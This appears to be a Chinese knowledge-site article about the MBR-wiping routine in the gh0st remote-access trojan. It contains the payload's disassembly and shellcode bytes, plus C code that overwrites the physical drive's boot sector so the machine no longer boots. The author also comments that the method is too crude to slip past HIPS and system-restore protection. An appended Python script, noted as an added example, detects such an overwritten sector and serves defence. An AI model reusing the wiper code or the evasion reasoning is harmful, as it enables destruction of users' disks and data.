豪仕知识网 -- Knowledge is power!


Modifying the MBR code in gh0st with VC (vcomputer self-modifying code)

Author: 有胸为大 2024-01-03 20:27:36


The overwritten MBR code: it clears the screen, displays the string "I am virus! Fuck you :-)", and then enters an infinite loop.

    seg000:0000                 mov     ax, 12h
    seg000:0003                 int     10h             ; - VIDEO - SET VIDEO MODE
    seg000:0003                                         ; AL = mode
    seg000:0005                 mov     bp, 7C18h       ; string start addr
    seg000:0008                 mov     cx, 18h         ; string length
    seg000:000B                 mov     ax, 1301h
    seg000:000E                 mov     bx, 0Ch
    seg000:0011                 mov     dx, 0E1Dh
    seg000:0014                 int     10h             ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)
    seg000:0014                                         ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number
    seg000:0014                                         ; DH,DL = row,column of starting cursor position, CX = length of string
    seg000:0014                                         ; ES:BP -> start of string
    seg000:0014
    seg000:0016
    seg000:0016 ForeverLoop:                            ; CODE XREF: seg000:ForeverLoopj
    seg000:0016                 loop    ForeverLoop
    seg000:0016
    seg000:0016 ; ---------------------------------------------------------------------------
    seg000:0018 s_IAmVirusFuckY db 'I am virus! Fuck you :-)'
    seg000:0018 seg000          ends

The C code that writes the MBR:

    unsigned char scode[] =
    "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
    "\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
    "\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";

    int CGh0stApp::KillMBR()
    {
    //  HANDLE hDevice;
    //  DWORD dwBytesWritten, dwBytesReturned;
    //  BYTE pMBR[512] = {0};
    //
    //  // Rebuild the MBR
    //  memcpy(pMBR, scode, sizeof(scode) - 1);
    //  pMBR[510] = 0x55;
    //  pMBR[511] = 0xAA;
    //
    //  hDevice = CreateFile
    //      (
    //      "\\\\.\\PHYSICALDRIVE0",
    //      GENERIC_READ | GENERIC_WRITE,
    //      FILE_SHARE_READ | FILE_SHARE_WRITE,
    //      NULL,
    //      OPEN_EXISTING,
    //      0,
    //      NULL
    //      );
    //  if (hDevice == INVALID_HANDLE_VALUE)
    //      return -1;
    //  DeviceIoControl
    //      (
    //      hDevice,
    //      FSCTL_LOCK_VOLUME,
    //      NULL,
    //      0,
    //      NULL,
    //      0,
    //      &dwBytesReturned,
    //      NULL
    //      );
    //  // Write the virus payload
    //  WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
    //  DeviceIoControl
    //      (
    //      hDevice,
    //      FSCTL_UNLOCK_VOLUME,
    //      NULL,
    //      0,
    //      NULL,
    //      0,
    //      &dwBytesReturned,
    //      NULL
    //      );
    //  CloseHandle(hDevice);
    //  // ExitProcess(-1);
        return 0;
    }

However, this way of writing the MBR is crude: it triggers HIPS alerts, and it cannot get through system-restore or shadow-system protection.
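A defender-side check for the overwrite described above, as an added example that is not from the original page or from gh0st: it triages a 512-byte dump of sector 0 for the traits this routine leaves behind (zeroed partition table, boot code of only a few dozen bytes, the stub bytes listed above). The function names, finding labels, the 64-byte size threshold and both sample sectors are assumptions constructed for the illustration.

```python
from __future__ import annotations

SECTOR = 512
PT_OFF = 446  # four 16-byte partition entries, followed by the 55 AA signature
# Code bytes of the stub exactly as listed on the page (offsets 0x00-0x17).
STUB = bytes.fromhex("b81200cd10bd187cb91800b80113bb0c00ba1d0ecd10e2fe")


def triage_mbr(sector: bytes) -> list[str]:
    """Return findings for one 512-byte sector-0 dump (empty list = nothing flagged)."""
    if len(sector) != SECTOR:
        raise ValueError("expected exactly 512 bytes")
    findings = []
    if sector[510:512] != b"\x55\xaa":
        findings.append("no-boot-signature")
    # The routine zero-fills its buffer, so all four partition entries vanish.
    # Even a GPT disk keeps one protective entry (type 0xEE) in this table.
    if sector[PT_OFF:510] == bytes(64):
        findings.append("empty-partition-table")
    # Stock loaders occupy most of the 446-byte code area; the page's payload
    # is 48 bytes. The 64-byte cut-off is an assumed threshold, tune as needed.
    used = len(sector[:PT_OFF].rstrip(b"\x00"))
    if used < 64:
        findings.append(f"tiny-boot-code:{used}")
    if sector.startswith(STUB):
        findings.append("page-stub-match")
    return findings


def make_samples() -> dict[str, bytes]:
    """Constructed in-memory sectors; nothing is read from or written to disk."""
    # Stub plus a 24-byte stand-in for the message, zero padding, signature.
    overwritten = (STUB + b"X" * 24).ljust(510, b"\x00") + b"\x55\xaa"
    # Constructed 'healthy' sector: filler code bytes and one type-0x07 entry.
    entry = (bytes([0x80, 0, 0, 0, 0x07, 0, 0, 0])
             + (2048).to_bytes(4, "little") + (204800).to_bytes(4, "little"))
    healthy = (b"\x90" * PT_OFF + entry).ljust(510, b"\x00") + b"\x55\xaa"
    return {"overwritten": overwritten, "healthy": healthy}


if __name__ == "__main__":
    for name, data in make_samples().items():
        print(name, triage_mbr(data) or "clean")
```

The first two findings do not depend on the exact stub bytes, so they still fire if the message or video-mode constants are changed.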

